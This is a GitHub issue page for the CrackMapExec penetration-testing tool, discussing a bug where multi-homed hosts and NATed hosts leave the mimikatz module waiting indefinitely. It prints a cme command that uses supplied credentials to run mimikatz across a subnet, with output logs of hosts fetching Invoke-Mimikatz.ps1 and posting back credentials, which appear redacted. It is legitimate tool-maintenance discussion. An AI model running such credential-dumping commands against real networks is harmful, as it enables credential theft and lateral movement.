CrackMapExec icon indicating copy to clipboard operation
CrackMapExec copied to clipboard

Published 20 hours ago verified publisher icon byt3bl33d3r

Issue with multi-homed hosts

Open cclements opened this issue 7 years ago • 2 comments

Not sure if this is even worth addressing, but I just noticed on an engagement today that many of the hosts that never finish are in fact finishing, but are multi-homed. Here is example output from a system that I RDP'ed into to verify that all IPs were assigned to the same host:

cme smb 1.2.3.0/24 -u someuser -p 'somepassword' -M mimikatz
SMB         1.2.3.200  445 DOMAIN           [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB         1.2.3.200  445 DOMAIN           [+] DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.200                       [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       (null)\USER:PASSWORD
MIMIKATZ    1.2.3.200                       [+] Added 6 credential(s) to the database
MIMIKATZ    1.2.3.200                       [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_222944.log
SMB         1.2.3.205  445 DOMAIN           [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB         1.2.3.202  445 DOMAIN           [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB         1.2.3.210  445 DOMAIN           [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB         1.2.3.205  445 DOMAIN           [+] DOMAIN:USER:PASSWORD
SMB         1.2.3.202  445 DOMAIN           [+] DOMAIN:USER:PASSWORD
SMB         1.2.3.210  445 DOMAIN           [+] DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.205  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.210  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.202  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.200                       [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       (null)\USER:PASSWORD
MIMIKATZ    1.2.3.200                       [+] Added 6 credential(s) to the database
MIMIKATZ    1.2.3.200                       [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_223044.log
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       (null)\USER:PASSWORD
MIMIKATZ    1.2.3.200                       [+] Added 6 credential(s) to the database
MIMIKATZ    1.2.3.200                       [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_223045.log
MIMIKATZ    1.2.3.200                       [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       (null)\USER:PASSWORD
MIMIKATZ    1.2.3.200                       [+] Added 6 credential(s) to the database
MIMIKATZ    1.2.3.200                       [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_223052.log
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)

cclements avatar Apr 25 '17 03:04 cclements

Another interesting edge case. I'll definitly look into this but I have a feeling there won't be that much I can do. Cheers

byt3bl33d3r avatar Apr 25 '17 17:04 byt3bl33d3r

Another edge to add to this case :)

In a recent test I was able to crack an admin account on a remote subnet across a NATing firewall, and tried to hit them with the mimikatz cme module. The communication to the remote subnet succeeded, however, when the remote machine initiated the https connection back to the cme webserver, they were NATed by the firewall and therefore the originating IP did not match what cme expected causing cme to error and wait indefinitely.

A fix for both of these edges might be for cme to issue private URLs (e.g. https://cme.box/some_hash) to match host responses on instead of name/ip.

cclements avatar Aug 11 '17 19:08 cclements